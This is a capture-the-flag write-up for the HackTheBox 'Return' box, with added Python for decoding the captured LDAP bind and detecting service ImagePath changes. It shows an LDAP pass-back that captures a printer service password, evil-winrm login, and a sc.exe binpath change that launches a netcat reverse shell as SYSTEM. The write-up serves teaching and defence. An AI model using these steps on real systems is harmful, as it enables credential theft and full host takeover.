An easy Windows box from HackTheBox, using an SSRF to capture a password, then modifying a service path to get SYSTEM.

Return

Recon

Usual nmap scan

sudo nmap -p- -sV -oA nmap/return 10.10.11.108
PORT      STATE SERVICE       VERSION  
53/tcp    open  domain        Simple DNS Plus  
80/tcp    open  http          Microsoft IIS httpd 10.0  
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-20 02:33:18Z)  
135/tcp   open  msrpc         Microsoft Windows RPC  
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn  
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)  
445/tcp   open  microsoft-ds?  
464/tcp   open  kpasswd5?  
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0  
636/tcp   open  tcpwrapped  
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)  
3269/tcp  open  tcpwrapped  
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)  
9389/tcp  open  mc-nmf        .NET Message Framing  
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)  
49664/tcp open  msrpc         Microsoft Windows RPC  
49665/tcp open  msrpc         Microsoft Windows RPC  
49666/tcp open  msrpc         Microsoft Windows RPC  
49667/tcp open  msrpc         Microsoft Windows RPC  
49671/tcp open  msrpc         Microsoft Windows RPC  
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0  
49675/tcp open  msrpc         Microsoft Windows RPC  
49679/tcp open  msrpc         Microsoft Windows RPC  
49682/tcp open  msrpc         Microsoft Windows RPC  
49694/tcp open  msrpc         Microsoft Windows RPC  
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Run an initial crackmapexec for some SMB enumeration

kali@kali-$ crackmapexec smb 10.10.11.108  

SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)

Navigating to the IP in a browser also shows a printer settings page

Exploitation

The password field is masked, but the server address can be changed to the Kali machine's IP: listen with netcat on port 389, hit the update button, and the box sends its bind request (credentials included) to us

nc -lnvp 389
listening on [any] 389 ...  
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 63570  
0*`%return\svc-printer�  
                      1edFg43012!!

Now we have both a user and password, svc-printer:1edFg43012!!
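The garbled line netcat printed is an LDAPv3 simple BindRequest, which is why the password arrives in clear text: the printer binds over plain LDAP on 389 with simple authentication instead of LDAPS or a SASL bind. As an added example that is not part of the original writeup, the frame below is reconstructed from the capture (the lengths 0x2a and 0x25 are exactly the "0*" and "`%" that showed on screen) and decoded field by field:

```python
# Constructed reproduction of the LDAP frame netcat printed above: the lengths
# and strings come from the capture, the non-printable bytes are filled in per
# the LDAPv3 BER encoding (RFC 4511). Not a raw packet dump from the box.
CAPTURED_BIND = (
    b"\x30\x2a"                         # LDAPMessage SEQUENCE, 42 bytes -> prints as "0*"
    b"\x02\x01\x01"                     # messageID INTEGER 1
    b"\x60\x25"                         # [APPLICATION 0] BindRequest, 37 bytes -> prints as "`%"
    b"\x02\x01\x03"                     # version INTEGER 3
    b"\x04\x12" b"return\\svc-printer"  # name OCTET STRING, 18 bytes
    b"\x80\x0c" b"1edFg43012!!"         # authentication [0] simple: the password in the clear
)


def parse_ldap_simple_bind(data: bytes):
    """Decode one LDAPv3 BindRequest that uses simple authentication.

    Returns (message_id, version, bind_name, password), or None if the frame
    is another LDAP operation or a SASL bind. Only short-form BER lengths
    (< 128 bytes) are handled, enough for any printer-sized bind.
    """
    def tlv(buf, pos):
        tag, length = buf[pos], buf[pos + 1]
        if length & 0x80:
            raise ValueError("long-form BER length not handled")
        start = pos + 2
        return tag, buf[start:start + length], start + length

    tag, msg, _ = tlv(data, 0)
    if tag != 0x30:                     # every LDAPMessage is a SEQUENCE
        return None
    tag, mid, pos = tlv(msg, 0)
    if tag != 0x02:
        return None
    tag, body, _ = tlv(msg, pos)
    if tag != 0x60:                     # some other protocolOp, not BindRequest
        return None
    tag, ver, pos = tlv(body, 0)
    tag, name, pos = tlv(body, pos)
    if tag != 0x04:
        return None
    tag, cred, _ = tlv(body, pos)
    if tag != 0x80:                     # 0xa3 would be SASL credentials instead
        return None
    return (int.from_bytes(mid, "big"), int.from_bytes(ver, "big"),
            name.decode("utf-8", "replace"), cred.decode("utf-8", "replace"))


if __name__ == "__main__":
    print(parse_ldap_simple_bind(CAPTURED_BIND))
```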

Now we can use evil-winrm to get a prompt on the box

evil-winrm -u svc-printer -p '1edFg43012!!' 10.10.11.108

And get the user flag

After enumerating the groups the user belongs to, we find that svc-printer is a member of Server Operators, which gives it permission to start, stop and reconfigure services

*Evil-WinRM* PS C:\Users\svc-printer\desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Then upload nc64.exe, which we will use to set up a reverse shell as Admin

*Evil-WinRM* PS C:\Users\svc-printer> upload nc64.exe

We would like to list the services the user can modify, but svc-printer is not allowed to enumerate the Service Control Manager, so sc.exe query fails with access denied

*Evil-WinRM* PS C:\Users\svc-printer> sc.exe query
[SC] OpenSCManager FAILED 5:

Access is denied.

Instead we modify a service we already know exists, VSS (Volume Shadow Copy), and set its binpath to a netcat reverse shell

*Evil-WinRM* PS C:\Users\svc-printer> sc.exe config VSS binpath="C:\Users\svc-printer\nc64.exe -e cmd 10.10.14.11 8000"

Then stop the service

sc.exe stop VSS

Then start a netcat listener on port 8000 and start the service, which runs our binpath as SYSTEM and gives us the privileged shell

sc.exe start VSS
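From the defender's side, the tell-tale of this procedure is a service's ImagePath being rewritten to point at a binary in a user profile, which Sysmon records as Event ID 13 (registry value set) on HKLM\System\CurrentControlSet\Services\<name>\ImagePath. As an added example, not part of the original writeup, this runs that check over constructed records modelled on the VSS change above and flags any ImagePath whose executable lives outside the Windows and Program Files trees:

```python
# Constructed Sysmon Event ID 13 (RegistryEvent, value set) records modelled on
# the binpath change in the writeup; not real telemetry from the box. The first
# record is the stock VSS ImagePath, the second the rewrite to nc64.exe.
SAMPLE_EVENTS = [
    {"EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VSS\ImagePath",
     "Details": r"%systemroot%\system32\vssvc.exe"},
    {"EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VSS\ImagePath",
     "Details": r"C:\Users\svc-printer\nc64.exe -e cmd 10.10.14.11 8000"},
    {"EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\Start",
     "Details": "DWORD (0x00000002)"},
]

SERVICES_KEY = "hklm\\system\\currentcontrolset\\services\\"
# Roots a service binary is expected to live under; a user profile, temp
# directory or share is where a planted binary ends up instead.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def service_exe(image_path: str) -> str:
    """Extract the executable from an ImagePath/binPath command line, lower-cased
    and with %SystemRoot% expanded so it can be compared against TRUSTED_ROOTS."""
    s = image_path.strip()
    if s.startswith('"'):               # quoted path, may contain spaces
        exe = s[1:s.find('"', 1)]
    else:                               # unquoted: executable ends at first space
        exe = s.split()[0] if s else ""
    return exe.lower().replace("%systemroot%", "c:\\windows")


def flag_imagepath_changes(events):
    """Return (service, executable) for every ImagePath write whose executable
    sits outside the trusted roots."""
    hits = []
    for ev in events:
        key = ev.get("TargetObject", "").lower()
        if ev.get("EventID") != 13 or not key.startswith(SERVICES_KEY) \
                or not key.endswith("\\imagepath"):
            continue
        service = ev["TargetObject"].split("\\")[-2]
        exe = service_exe(ev["Details"])
        if not exe.startswith(TRUSTED_ROOTS):
            hits.append((service, exe))
    return hits


if __name__ == "__main__":
    for service, exe in flag_imagepath_changes(SAMPLE_EVENTS):
        print(f"ALERT: service {service} ImagePath now runs {exe}")
```

Pairing the alert with a baseline of each service's expected ImagePath (the Security log's 4697 only fires for newly installed services, not reconfigured ones) catches the case where the new path is still under a trusted root.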